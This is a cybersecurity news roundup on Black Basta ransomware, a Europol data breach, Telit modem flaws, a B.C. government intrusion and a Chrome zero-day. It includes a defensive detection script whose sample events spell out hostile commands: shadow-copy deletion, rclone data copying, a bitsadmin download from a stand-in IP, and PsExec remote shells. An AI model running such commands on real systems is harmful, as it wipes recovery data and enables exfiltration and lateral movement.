Cyber Roundup
Welcome to this week’s edition of the “Bi-Weekly Cyber Roundup” by Canary Trap. At Canary Trap, it is our mission to keep you up-to-date with the most crucial news in the world of cybersecurity and this bi-weekly publication is your gateway to the latest news.
In this week’s roundup, we’ll start by recapping the activities of the Black Basta ransomware group. Following that, we’ll cover a Europol data breach, where the stolen data is now up for auction. Additionally, we’ll uncover a critical security vulnerability in a widely used modem. We’ll also explore the recent cyberattack on B.C.’s government and identify the responsible party. Lastly, we’ll learn about the zero-day vulnerability in Chrome that was addressed by Google.
- Black Basta Ransomware Hit Over 500 Organizations
The Black Basta ransomware group has hit more than 500 organizations globally, including critical infrastructure entities in North America, Europe, and Australia, the US government warns.
First identified in April 2022, Black Basta has been operating under the ransomware-as-a-service (RaaS) business model, where affiliates conduct cyberattacks, deploy malware against victim organizations, and collect a percentage of the ransom payment. In a November 2023 report, blockchain analytics firm Elliptic estimated that Black Basta affiliates had received over $100 million in ransom payments from at least 90 victim organizations. According to a new alert from CISA, the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), Black Basta affiliates have conducted attacks against 12 out of 16 critical infrastructure sectors, including healthcare organizations.
For initial access, the cybercriminals rely on phishing and the exploitation of known vulnerabilities, such as CVE-2024-1709, a critical ConnectWise ScreenConnect flaw that started being exploited only days after it was publicly disclosed on February 19. After compromising a victim’s network, the attackers deploy various tools for remote access, network scanning, lateral movement, privilege escalation, and data exfiltration, including SoftPerfect, BITSAdmin, PsExec, Mimikatz, and RClone.
The Black Basta affiliates were also observed exploiting vulnerabilities such as ZeroLogon, NoPac, and PrintNightmare for privilege escalation, abusing Remote Desktop Protocol (RDP) for lateral movement, and deploying the Backstab tool to disable endpoint detection and response (EDR) solutions. After exfiltrating the victim’s data, the attackers delete volume shadow copies to hinder recovery, deploy ransomware to encrypt the compromised systems, and drop a ransom note.
The new alert from CISA, FBI, HHS, and MS-ISAC provides details on the tactics, techniques, and procedures (TTPs) employed by Black Basta affiliates, indicators of compromise (IoCs), and recommended mitigations.
The agencies note that healthcare organizations are attractive targets for cybercrime actors because of their size, technological dependence, access to personal health information, and the unique impact of disruptions to patient care. The authoring organizations urge the Healthcare and Public Health (HPH) sector and all critical infrastructure organizations to apply the recommendations in the mitigations section to reduce the likelihood of compromise by Black Basta and other ransomware attacks.
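The post-compromise steps summarized above (BITSAdmin downloads, PsExec lateral movement, RClone exfiltration, and deletion of volume shadow copies before encryption) are all visible in process-creation telemetry. The following is an added detection example written for this roundup, not code from the advisory or from Canary Trap; the event format, host names and command lines are constructed samples, and the rule patterns are assumptions modelled on the tools named in the text.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (not real telemetry), one per line:
# <timestamp> host=<host> user=<user> image=<path> cmdline="<command line>"
SAMPLE_EVENTS = r"""
2024-05-13T02:14:07Z host=WS-041 user=CORP\jsmith image=C:\Windows\System32\vssadmin.exe cmdline="vssadmin.exe delete shadows /all /quiet"
2024-05-13T02:15:22Z host=SRV-DB1 user=CORP\svc_bkp image=C:\Tools\rclone.exe cmdline="rclone.exe copy D:\Finance remote:bucket"
2024-05-13T02:16:01Z host=WS-041 user=CORP\jsmith image=C:\Windows\System32\bitsadmin.exe cmdline="bitsadmin /transfer j1 /download http://203.0.113.5/a.dat C:\Users\Public\a.dat"
2024-05-13T02:17:45Z host=WS-041 user=CORP\jsmith image=C:\Temp\PsExec64.exe cmdline="PsExec64.exe \\SRV-FS1 cmd.exe"
2024-05-13T02:18:10Z host=SRV-FS1 user=CORP\svc_adm image=C:\Windows\System32\wbem\WMIC.exe cmdline="wmic shadowcopy delete"
2024-05-13T09:00:00Z host=WS-077 user=CORP\abrown image=C:\Program Files\Backup\backup.exe cmdline="backup.exe --snapshot D:\Data"
"""

EVENT_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) image=(?P<image>.+?) cmdline="(?P<cmd>.*)"$')

# Command-line patterns for the Black Basta tooling named in the advisory summary (assumed, not from the advisory).
RULES = {
    "shadow_copy_deletion": re.compile(r"\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)\b", re.I),
    "rclone_exfil": re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I),
    "bitsadmin_transfer": re.compile(r"\bbitsadmin(\.exe)?\s+/transfer\b", re.I),
    "psexec_lateral": re.compile(r"\bpsexec(64)?(\.exe)?\s+\\\\", re.I),
}

def parse_event(line):
    """Parse one event line into a dict; return None for lines that do not fit the format."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None

def detect(text):
    """Return one (rule, host, user, timestamp) tuple per event whose command line matches a rule."""
    hits = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        for name, pattern in RULES.items():
            if pattern.search(ev["cmd"]):
                hits.append((name, ev["host"], ev["user"], ev["ts"]))
    return hits

def escalate(hits):
    """Rate hosts: shadow-copy deletion plus another indicator is 'critical' (recovery wiped after staging); a lone hit is 'high'."""
    rules_by_host = defaultdict(set)
    for rule, host, _user, _ts in hits:
        rules_by_host[host].add(rule)
    return {host: "critical" if "shadow_copy_deletion" in rules and len(rules) > 1 else "high"
            for host, rules in rules_by_host.items()}
```

The legitimate backup job on WS-077 produces no hit, while WS-041 is rated critical because shadow-copy deletion follows the download and lateral-movement indicators on the same host.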
- Europol Confirms Incident Amid Alleged Auction of Staff Data
Europol is currently investigating claims made by a cybercriminal regarding the theft of confidential data from several of the agency’s sources. While the specific details of the breach remain under scrutiny, it has been confirmed that the Europol Platform for Experts (EPE) is a central focus of the incident, and the platform has been offline for maintenance since May 10. However, Europol asserts that no operational data has been compromised, and core systems remain unaffected.
The cybercriminal, known as IntelBroker, has previously claimed responsibility for various high-profile breaches, including attacks on the Pentagon and national security agencies. In this instance, IntelBroker purportedly accessed Europol data designated as classified and for official use only, including source code and alliance employees’ information.
Moreover, the breach allegedly extends to other divisions within Europol, such as the European Cybercrime Centre (EC3) and the Partnership on Climate Change and Sustainable Energy (CCSE), along with the SIRIUS project. Samples of leaked data provided by IntelBroker include screenshots of the EPE platform and discussions between law enforcement and SIRIUS officers. The leaked data also includes a comprehensive list of users of the EC3 secure messaging feature, containing personal details such as full names, job titles, and areas of expertise. IntelBroker has claimed to have sold the stolen data, accepting offers via direct message on BreachForums and payment solely in Monero.
This incident comes on the heels of a separate data exposure at the European Parliament, where data from its PEOPLE recruitment app was compromised. Staff members were advised to change their passwords and remain vigilant against potential scams.
Despite Europol’s ongoing investigation, further details about the breach remain undisclosed. However, these incidents underscore the persistent threat posed by cybercriminals to sensitive government agencies and institutions across the European Union, necessitating enhanced cybersecurity measures and proactive defense strategies to mitigate risks effectively.
- Widely Used Modems in Industrial IoT Devices Open to SMS Attack
Security researchers from Kaspersky’s ICS CERT division unveiled a series of critical security flaws in Telit Cinterion cellular modems, which are extensively utilized across industrial, healthcare, and telecommunications sectors. These vulnerabilities, disclosed in November 2023, expose a range of risks, including the potential for remote attackers to execute arbitrary code via SMS.
The most severe vulnerability, CVE-2023-47610, is a heap overflow in the modem’s Secure User Plane Location (SUPL) message handlers, rated 8.8 by Kaspersky and 9.8 by NIST. Exploiting this flaw via specially crafted SMS messages grants attackers remote access to the modem’s operating system, allowing manipulation of RAM and flash memory without authentication or physical access.
While other vulnerabilities identified by Kaspersky received lower severity scores, they still pose significant risks, particularly in compromising the integrity of Java-based applications (MIDlets) and bypassing digital signature checks. This could lead to code execution with elevated privileges, threatening data confidentiality, network security, and device integrity. The impact of these vulnerabilities extends beyond the Cinterion EHS5-E series modem to various other Telit products with similar software and hardware architecture, including Cinterion BGS5, EHS5/6/7, PDS5/6/8, ELS61/81, and PLS62. Despite some patches issued by Telit, several vulnerabilities remain unaddressed, raising concerns about widespread disruption across sectors.
To mitigate these threats, Kaspersky recommends collaborating with telecom operators to disable SMS sending to affected devices and to use securely configured private APNs. Enforcing application signature verification and implementing measures to prevent unauthorized physical access are also crucial steps in enhancing security. Evgeny Goncharov, head of Kaspersky ICS CERT, emphasizes the challenge of identifying impacted products because the modems are integrated into other solutions. The widespread deployment of these devices underscores the urgent need for proactive security measures and collaboration among stakeholders to safeguard against potential cyber threats and mitigate the risk of extensive global disruption.
- State or State-Sponsored Actor Was Behind B.C. Government Cyber Attack
The B.C. government faced a sophisticated cyber attack orchestrated by a state or state-sponsored actor, revealed Shannon Salter, head of B.C.’s public service. The breach, known since April 10, was confirmed by online security experts the following day. Premier David Eby was briefed on April 17, while a subsequent attempt by the same threat actor was discovered on April 29. Despite the attack’s sophistication, there’s no evidence of compromised sensitive personal information, according to Public Safety Minister Mike Farnworth. However, specifics regarding the accessed information and indicators of a state-sponsored attack remain undisclosed.
The decision to delay public disclosure until May 8 sparked criticism, with accusations of concealment from B.C. United MLAs. Salter defended the delay, citing cybersecurity advice to avoid alerting other hackers to government network vulnerabilities. The incident involved three separate intrusion attempts, each accompanied by efforts to conceal the hackers’ tracks.
Eric Li, a cybersecurity specialist at the University of British Columbia, questioned the delay in prompting public servants to change their passwords. He highlighted the challenge of monitoring remote workers’ connections to lower-security Wi-Fi systems amidst the pandemic-induced surge in telecommuting.
The extent of the attack, analyzed through 40 terabytes of data, remains under investigation. The motive behind the attack, including potential targeting of specific government records, remains unclear. Despite the absence of a ransom demand, the breach raises concerns about the security of millions of British Columbians’ personal data, including social insurance numbers.
Although Microsoft’s warning of Russian-backed hackers targeting U.S. federal agencies has raised speculation, B.C. officials refrain from confirming any links. Farnworth emphasized the province’s cybersecurity measures, boasting 76 cybersecurity experts and an annual $25 million investment in cybersecurity efforts.
- Exploited Chrome Zero-Day Patched by Google
On Thursday, Google released a Chrome 124 update addressing a zero-day vulnerability, CVE-2024-4671, which the tech giant reports is actively exploited in the wild. This high-severity use-after-free bug affects the Visuals component and was reported by an anonymous researcher on May 7. Impressively, Google developed and deployed the patch within just two days.
However, Google’s advisory lacks details on any bug bounty associated with CVE-2024-4671, and there’s no information available on the specific attacks exploiting this vulnerability. Yet, given Chrome’s history, it’s not uncommon for commercial spyware vendors to target such vulnerabilities. The patched versions, Chrome 124.0.6367.201/.202 for Mac and Windows, and Chrome 124.0.6367.201 for Linux, address CVE-2024-4671. Notably, this isn’t the first exploited Chrome vulnerability of 2024; CVE-2024-0519 was patched in January.
A recent report by Google and Mandiant revealed a concerning trend, with 97 zero-day vulnerabilities exploited in 2023—a 50% increase from the previous year. Among these, eight targeted Chrome, with spyware vendors responsible for 75% of known zero-day exploits affecting Google products and Android ecosystem devices in 2023.
References:
- https://www.securityweek.com/black-basta-ransomware-hit-over-500-organizations/
- https://www.theregister.com/2024/05/13/europol_data_breach/
- https://www.bleepingcomputer.com/news/security/widely-used-modems-in-industrial-iot-devices-open-to-sms-attack/
- https://vancouversun.com/news/local-news/state-or-state-sponsored-actor-was-behind-b-c-government-cyber-attack
- https://www.securityweek.com/exploited-chrome-zero-day-patched-by-google/